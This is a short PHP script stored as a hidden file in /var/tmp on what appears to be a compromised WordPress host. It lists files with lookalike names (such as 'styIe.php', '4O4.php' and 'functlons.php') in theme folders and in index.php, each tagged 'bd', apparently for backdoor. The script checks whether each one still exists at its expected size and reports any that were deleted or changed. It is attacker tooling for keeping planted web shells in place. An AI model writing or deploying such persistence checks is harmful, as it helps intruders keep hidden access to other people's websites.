File: //var/tmp/.ptr
<?php $r = '/home/gleweb2/fraidknot.ca'; $x = ["/wp-content/themes/custom-file-2-1748023486/styIe.php"=>"bd@@633866@@727",
"/wp-content/themes/widget-area-1757843613/4O4.php"=>"bd@@458541@@967",
"/wp-content/themes/widget_area_1748012675/4O4.php"=>"bd@@614722@@727",
"/index.php"=>"bd@@742218@@405",
"/wp-content/themes/top_1747909531/singIe.php"=>"bd@@222343@@731",
"/wp-content/themes/error_404_1751704414/singIe.php"=>"bd@@661961@@727",
"/wp-content/themes/author_template_1751116910/functlons.php"=>"bd@@485866@@727"]; foreach ($x as $p => $l) { $f = "{$r}{$p}"; list($t, $id, $pt) = explode('@@', $l); if (!file_exists($f)) { print "<$t>{$id}##d</$t>\n"; continue; } if (is_numeric($pt)) { $fs = filesize($f); if ($fs != $pt) { print "<$t>{$id}##bs</$t>\n"; } } else { $c = file_get_contents($f); if (!strstr($c, $pt)) { print "<$t>{$id}##d</$t>\n"; } } } die('!end!');